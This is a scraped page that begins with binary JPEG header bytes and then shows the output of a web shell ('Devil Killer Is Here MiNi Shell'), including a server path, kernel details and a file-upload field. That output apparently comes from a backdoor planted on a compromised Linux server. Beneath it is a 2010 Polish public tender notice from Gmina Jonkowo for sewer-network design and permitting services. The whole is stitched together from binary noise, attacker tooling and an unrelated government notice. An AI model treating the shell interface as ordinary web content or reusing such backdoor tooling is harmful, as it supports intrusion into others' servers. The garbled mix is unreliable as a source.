JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100804/209661-N-2010.html

<p class="kh_header"><b>Jonkowo: Kompleksowa obsługa administracyjna, prawna i projektowa poprzedzająca inwestycję budowlaną.</b><br>
<b>Numer ogłoszenia: 209661 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jonkowo , ul. Klonowa 2, 11-042 Jonkowo, woj. warmińsko-mazurskie, tel. 0-89 512 92 32, faks 0-89 512 92 37, 512 92 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jonkowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa administracyjna, prawna i projektowa poprzedzająca inwestycję budowlaną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełen zakres usług związanych z przygotowaniem i zaprojektowaniem inwestycji budowlanej - budowy sieci kanalizacji sanitarnej dla terenów budowlanych wsi Warkały oraz części wsi Giedajty i Wilimowo z włączeniem do istniejącej sieci kanalizacyjnej w miejscowości Giedajty, w gminie Jonkowo, powiat olsztyński, województwo warmińsko-mazurskie. 
2.	Zamówienie obejmuje obsługę administracyjno - prawną, prace przedprojektowe i przygotowanie inwestycji w zakresie projektowym łącznie z uzyskaniem pozwolenia na budowę, a także opracowanie dokumentacji stanowiącej podstawę określenia wartości zamówienia na roboty budowlane oraz opisującej przedmiot zamówienia w myśl przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2010 r. Nr 113, poz. 759). 
3.	W zakres zamówienia wchodzi:
1)	Prowadzenie w imieniu Zamawiającego (Inwestora) czynności administracyjno-prawnych związanych przygotowaniem  i zaprojektowaniem inwestycji, składanie wniosków, oraz uzyskanie dokumentów formalno-prawnych, uzgodnień, opinii i warunków umożliwiających realizację inwestycji a w szczególności:
a)	ustalenie trasy kanalizacji sanitarnej z możliwością włączenia:
­	istniejących budynków (z doprowadzeniem studni do granicy działki od strony sieci),
­	kanalizacji osiedlowych z terenów planowanej zabudowy mieszkaniowej, usługowej i pensjonatowej - na mapie poglądowej  oznaczonych  kolorem żółtym i numeracją od 1 do 7, 
oraz włączenie kanalizacji do istniejącej sieci w miejscowości Giedajty (studnia rewizyjna w drodze na działce nr 24/42 lub inne miejsce uzgodnione z Zakładem Gospodarki Komunalnej w Jonkowie). Trasę sieci kanalizacji sanitarnej należy również uzgodnić z Zamawiającym;
b)	zebranie zgody właścicieli nieruchomości na przebieg  inwestycji przez teren ich nieruchomości (treść pisemnej zgody właścicieli na wejście w teren nieruchomości należy uzgodnić z Zamawiającym);
c)	przygotowanie materiałów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach, do wniosku o wydanie decyzji o lokalizacji inwestycji celu publicznego oraz do projektowania (w szczególności uzyskanie wypisów z ewidencji gruntów, nabycie niezbędnych map geodezyjnych łącznie z ich aktualizacją, opracowanie karty informacyjnej przedsięwzięcia);
d)	złożenie w imieniu Gminy Jonkowo do  Wójta Gminy Jonkowo kompletnego wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgodnie z wymogami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. Nr 199 poz. 1227 z późn. zm.) oraz uzyskanie decyzji;
e)	przygotowanie i złożenie do Wójta Gminy Jonkowo kompletnego wniosku o wydanie decyzji o lokalizacji inwestycji celu publicznego;
f)	złożenie w imieniu Gminy Jonkowo do Starosty Powiatu Olsztyńskiego kompletnego wniosku o wydanie decyzji pozwolenie na budowę i uzyskanie decyzji.
2)	Prace przedprojektowe w szczególności: 
­	badania geologiczne,
­	przygotowanie dokumentacji geodezyjno-kartograficznej w zakresie niezbędnym do projektowania.
3)	Prace projektowe:
a)	opracowanie projektu budowlanego oraz projektów wykonawczych  zgodnie z obowiązującymi przepisami ustawy z dnia ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), spełniających wymagania w zakresie opisu przedmiotu zamówienia ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2010 r. Nr 113, poz. 759) - w sposób określony przepisami rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.),
b)	przygotowanie dokumentów niezbędnych do uzyskania decyzji o pozwoleniu na budowę, 
c)	uzgadnianie dokumentacji z jednostkami zewnętrznymi.
d)	opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
4)	Opracowanie dokumentacji stanowiącej podstawę określenia wartości zamówienia na roboty budowlane oraz pozostałej dokumentacji opisującej przedmiot zamówienia zgodnie z przepisami ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2010 r. Nr 113, poz. 759): 
a)	kosztorysu inwestorskiego sporządzonego na podstawie przepisów rozporządzenia rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389),
b)	przedmiarów robót - w sposób określony przepisami rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.),
c)	specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.).
5)	opracowanie w oparciu o dokumentację projektową oraz kosztorys inwestorski wstępnego harmonogramu rzeczowo-finansowego inwestycji.
4.	Opracowana przez Wykonawcę dokumentacja projektowa oraz pozostałe opracowania winny być międzybranżowo skoordynowana technicznie i kompletne z punktu widzenia celu, któremu mają służyć tj: przeprowadzeniu postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy robót budowlanych oraz realizacji planowanej inwestycji. 
5.	Załączniki do wniosków obejmują: 
1) o wydanie decyzji o środowiskowych uwarunkowaniach:
­-  wypisy z ewidencji gruntów obejmujące przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmujące obszar, na który będzie oddziaływać przedsięwzięcie - pobrane ze Starostwa Powiatowego w Olsztynie;
­-  poświadczoną przez właściwy organ kopię mapy ewidencyjnej obejmującą przewidywany teren, na którym będzie realizowane przedsięwzięcie i obszar, na który będzie oddziaływać przedsięwzięcie - uzyskana w Starostwie Powiatowym w Olsztynie pl. Bema 5, z oznaczonym obszarem przewidywanego terenu, na którym będzie realizowane przedsięwzięcie oraz oznaczonym obszarem, na który będzie oddziaływać przedsięwzięcie,
­-  kartę informacyjną przedsięwzięcia sporządzoną zgodnie z art. 3 ust. 1 pkt 5 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r., Nr 199, poz. 1227 z późn. zm.) - w trzech egzemplarzach wraz z jej zapisem w formie elektronicznej na informatycznym nośniku danych.
2)  o wydanie decyzji o lokalizacji inwestycji celu publicznego:
­-  wniosek z charakterystyką inwestycji - m.in. długość, średnica, przepompownie i inne charakterystyczne elementy, 
­-  wykaz właścicieli działek,
­-  mapa sytuacyjno-wysokościowa w skali 1:2000 z przebiegiem inwestycji (co najmniej 2 egz.),
­-  decyzja środowiskowa, o której mowa w ust. 3 i 5.
6.  Projekt budowlany, projekty wykonawcze, dokumentacja z badań geologicznych oraz pozostałe opracowania wymienione w ust. 3 pkt. 4 i 5  powinny być również zapisane na nośniku elektronicznym w formatach możliwych do edycji w programach pakietu Microsoft Office i przekazane Zamawiającemu zgodnie z postanowieniami ust. 10 niniejszej SIWZ.
7.  Wnioski - o wydanie decyzji o środowiskowych uwarunkowaniach oraz o wydanie decyzji o lokalizacji inwestycji celu publicznego kierowane do Wójta Gminy Jonkowo Wykonawca będzie składał w sekretariacie Urzędu Gminy Jonkowo  pok. 16 piętro lub prześle na adres: Wójt Gminy Jonkowo ul. Klonowa 2 11-042 Jonkowo.
8.  Część opisową przedmiotu zamówienia uzupełniają załączniki SIWZ: 
1) Załącznik Nr 2 - mapa poglądowa wskazująca lokalizację terenów przewidzianych do skanalizowania - miejscowości  Warkały oraz części Wilimowa i Giedajt z zaznaczonym obszarem zabudowy wsi oraz oznaczonymi terenami planowanej zabudowy mieszkaniowej, usługowej i pensjonatowej, 
2) Załącznik Nr 3 - Informacje dot. przewidywanej liczby działek budowlanych w terenach planowanej zabudowy mieszkaniowej i pensjonatowej. 
9.  Zaleca się, aby Wykonawca na swoją własną odpowiedzialność i ryzyko zapoznał się z terenem, na którym ma być realizowana inwestycja oraz zdobył wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. 
10.  Wynagrodzenie Wykonawcy:
1) Wynagrodzenie będzie miało charakter zryczałtowany, płatny maksymalnie w trzech częściach, w wysokości zgodnej z  ofertą  wybranego Wykonawcy. 
2) Zapłata wynagrodzenia będzie odbywała się na podstawie nie więcej niż dwóch faktur częściowych, których łączna wartość nie może przekroczyć 80% ceny ryczałtowej brutto określonej w ofercie wybranego Wykonawcy, wystawionych  po zrealizowaniu: 
a) etapu przedprojektowego włącznie z uzyskaniem prawomocnej decyzji o lokalizacji inwestycji celu publicznego - do wysokości nie przekraczającej 20 % ceny ryczałtowej brutto, 
b) etapu projektowego - po uzyskaniu pozwolenia na budowę inwestycji i wydaniu Zamawiającemu dwóch egzemplarzy zatwierdzonego projektu budowlanego, 
oraz faktury końcowej wystawionej po wydaniu Zamawiającemu pozostałej dokumentacji: po 2 egz. projektów wykonawczych, dokumentacji z badań geologicznych, przedmiarów robót budowlanych, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego oraz harmonogramu rzeczowo-finansowego w wersji papierowej a także na nośniku elektronicznym.
11.  Zamawiający wymaga od Wykonawcy co najmniej 21 - dniowego terminu płatności faktur częściowych i faktury końcowej;
12.  Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości na wykonany i odebrany projekt budowlany, projekty wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary i kosztorysy, na okres nie krótszy niż 24 miesiące od  dnia  odbioru dokumentacji przez Zamawiającego.
13.  Zamawiający nie przewiduje rozliczenia  w walutach obcych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca  przystępujący  do  przetargu  zobowiązany  jest  wnieść przed upływem terminu składania ofert  tj. do godziny 10:00 dnia 20.08.2010 r. wadium w wysokości  5.000,00 zł słownie: pięć tysięcy złotych.
2.  Wykonawcy, których oferty nie będą zabezpieczone wadium do upływu terminu składania ofert zostaną wykluczeni z postępowania. 
3.  Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - Dz. U. Nr 109, poz. 1158 z późn. zm.,
4.  Wadium w pieniądzu należy wnieść przelewem na rachunek Urzędu Gminy Jonkowo Nr 14 8857 0002 3001 0000 0101 0001 w Warmińskim Banku Spółdzielczym w Jonkowie. 
5.  Wniesienie wadium w formie pieniężnej za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy pieniądze wpłyną na podane konto przed upływem terminu określonego w ust. 1.
6.  Wadium  wnoszone  w  formie  innej  niż  w pieniądzu można załączyć do oferty lub złożyć poza  ofertą u Skarbnika Gminy Jonkowo - Urząd Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo -pok. 20 I piętro, a w przypadku nieobecności Skarbnika w sekretariacie Urzędu  - pok. 16 I piętro.
7.  Wadium w formie poręczenia lub gwarancji powinno być wniesione na cały okres związania ofertą, o którym mowa w ust. 1 rozdziału XIII oraz zawierać w treści dokumentu:
a) dokładne określenie nazwy zamówienia,
b) kwotę zabezpieczenia,
c) termin ważności,
d) nieodwołalne i bezwarunkowe zobowiązanie się do zapłaty kwoty wadium na wypadek gdyby Wykonawca:
-  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - j.t. Dz.U. z 2010 r. Nr 113, poz. 759., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 wymienionej ustawy, lub pełnomocnictw i nie udowodnił, że wynikło to z przyczyn nieleżących po jego stronie,
-  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-  nie wniósł wymaganego  zabezpieczenia należytego wykonania umowy,
-  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. 
9.  Wadium Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza zostanie niezwłocznie zwrócone po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofa swoją ofertę przed upływem terminu składania ofert. Wniosek o zwrot wadium powinien być podpisany przez uprawnionych przedstawicieli wykonawcy. 
11.  Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Zaleca się wskazanie w ofercie nr rachunku bankowego, na który należy dokonać zwrotu wadium.
12.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynikło to z przyczyn nieleżących po jego stronie.
13.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy
3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie co najmniej dwie usługi, każda obejmująca sporządzenie zgodnie z przepisami ustawy dnia 29 stycznia 2004 r. Prawo zamówień publicznych (i przepisami wykonawczymi tym zakresie) dokumentacji projektowej (projektu budowlanego, projektów wykonawczych, przedmiarów robót budowlanych) oraz specyfikacji technicznych wykonania i odbioru robót budowlanych służących do opisu przedmiotu zamówienia na roboty budowlane, a także kosztorysów inwestorskich - związanych z budową sieci kanalizacyjnych o długości nie mniejszej niż 3 km składających się z kanalizacji grawitacyjnej i tłocznej z co najmniej dwoma przepompowniami. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisany warunek winien spełnić w całości co najmniej jeden z Wykonawców lub Wykonawcy łącznie.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz informacje zawarte w dokumentach złożonych na potwierdzenie spełniania warunku wyszczególnionych w rozdz. IX SIWZ tj: wykazu wykonanych usług i załączonych dokumentów potwierdzających, że usługi zostały wykonane należycie - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował do wykonywania zamówienia:
a)	co najmniej jedną osobą z uprawnieniami bez ograniczeń do projektowania sieci i instalacji kanalizacyjnych, posiadającą co najmniej 5 letnie doświadczenie zawodowe liczone od dnia uzyskania wymaganych uprawnień,
b)	co najmniej jedną osobą z uprawnieniami bez ograniczeń do projektowania sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającą co najmniej 5 letnie doświadczenie zawodowe liczone od dnia uzyskania wymaganych uprawnień, 
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisany warunek winien spełnić jeden z Wykonawców w całości lub Wykonawcy łącznie.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz informacje zawarte w dokumentach i oświadczeniu złożonych na potwierdzenie spełniania warunku, o których mowa w rozdz. IX SIWZ tj: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia i oświadczenia Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

